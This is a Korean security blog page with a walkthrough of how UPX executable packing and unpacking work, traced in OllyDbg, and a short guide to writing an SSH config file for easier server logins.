2. 비밀번호를 변경하고 로그아웃하자.


댓글 0

UPX Pakking principle

* UPX : 많고 많은 널리 사용되었던 실행 압축 프로그램


PE File : http://blog.hubeen.kr/306

실행압축?

실행압축이란 실행가능한 파일(PE파일)을 대상으로 파일 압축하여 용량과 리소스파일을 보지 못하게 함.
압축된 것을 푸는 방법은 파일 내에 압축해제 코드를 포함하고 있어서 실행되는 순간 메모리에서 압축을 해제시킨 후 실행된다.

Analysis


                                                                                                              [ not pakking.exe Section ]                                                                      [ pakking.exe Section ]                              


위의 이미지는 패킹된 프로그램과 패킹이 되지 않은 프로그램의 차이다.
패킹이 된 프로그램의 크기는 8.00KB에서 6.5KB로 줄어든 것을 볼 수 있으며,
섹션 또한 압축되어 있음을 알 수 있다.

PE File의 기본 구조는 IMAGE_DOS_HEADER - DOS_STUB_CODE - IMAGE_NT_HEADER - TEXT - data - .rsrc 이다.
하지만 압축된 프로그램의 섹션을 보면 UPX0 - UPX1 - .rsrc 로 되있는 것을 볼 수 있다.

그리고 보면 UPX0 섹션에는 RAW Size를 보면 0으로 아무런 값이 들어가있지 않는 청결 순수 이미지를 가진 섹션이라는 것을 알 수 있습니다.



하지만 virtual size는 6000이나 엄청 크다는 것을 볼 수 있습니다.

그렇다면 UPX1에는 압축해제 코드와 원본 데이터가 들어가있다는 것을 예상할 수 있습니다.

그리고 압축해제된 데이터는 upx0에 들어갈 것 같다는 예상을 할 수 있습니다.



그렇다면 이제 올리디버거를 열고 동적 분석을 시작하도록 하겠습니다.



프로그램 실행 전 레지스터와 스택의 상황입니다.



PUSHAD 명령어가 실행된 뒤의 스택의 상황입니다.

PUSHAD 명령어는 레지스터의 모든 값들을 스택에 집어넣습니다. 



ESI와 EDI를 첫번째 섹션과 두번째 섹션 주소로 세팅합니다.

ESI = UPX1

EDI = UPX0



아까 위에서 봤듯이 virtual size는 6000이였음을 보았습니다.

딱 UPX0과 UPX1의 차이가 6000임을 눈으로 직접 볼 수 있습니다.



이 부분은 UPX0 섹션의 데이터 1byte씩 읽어와서 집어넣는 부분이다.


[ UPX1 섹션 데이터 값들 ]


[ UPX0 섹션에 데이터가 차곡차곡 들어간 값들 ]


[ 압축해제 루틴 ]


IAT 복구



함수 이름을 UPX0에서 가져온 뒤 GetProcAddress 함수를 이용해서 함수의 주소를 읽어온다.



그리고 EBX가 가르키는 주소에 함수의 주소를 저장한다.


실제 주소인걸 화긴완료


이제 모든 코드를 압축해제하면 upx0 주소로 점프하는 것을 볼 수 있습니다.


'0x20 Security > 0x22 Reversing' 카테고리의 다른 글

UPX Pakking Principle (UPP)  (1) 2017.07.07
PE File Format  (0) 2016.07.23

댓글 1


오늘 작성할 내용은 ssh config 파일을 설정하여 서버 정보와 유저정보를 적어두면 따로 유저@주소를 적으며 접속을 하지 않아도 되게 되는 매@직!

매우 편리한 기능이라 할 수 있다.


alias에 명령어를 등록해가며 사용하셨다면 그 동안 뻘짓을 하였구나 라고 생각할 수 있을 정도입니다!


먼저 위의 경로로 이동을 해봅시다!



.ssh 폴더는 한번이라도 ssh 접속을 하였다면 known_hosts 라는 파일에 서버의 rsa키 같은 것들이 저장이 됩니다. 


이 곳에 config 파일을 생성하면 편하게 접속이 되게 됩니다!



Host 이름

    HostName 서버의 아이피

    User 계정명

    #IdentityFile 인증서의 경로

#Port 포트 (기본 값은 22)


로 간편하게 등록하고 간편하게 접속이 가능합니다.

인증서라고 하면 pem 같은 인증서를 말합니다.


위와 같이 등록을 한 뒤에 퍼미션을 설정을 해주여야 됩니다.


$ chmod 440 ~/.ssh/config


위와 같이 퍼미션을 설정을 해주었다면 아래와 같이 편하게 접속을 할 수 있습니다.



즐겁게 게으른 생활을 합시다!


'0x20 Security > 0x26 Server' 카테고리의 다른 글

ssh config 파일을 설정해보자!  (0) 2017.02.26
서버를 간지나게 꾸며보자  (0) 2016.10.14
Run ARM ELF for qemu in ubuntu  (0) 2016.08.31
Install mongodb  (0) 2016.07.26

댓글 0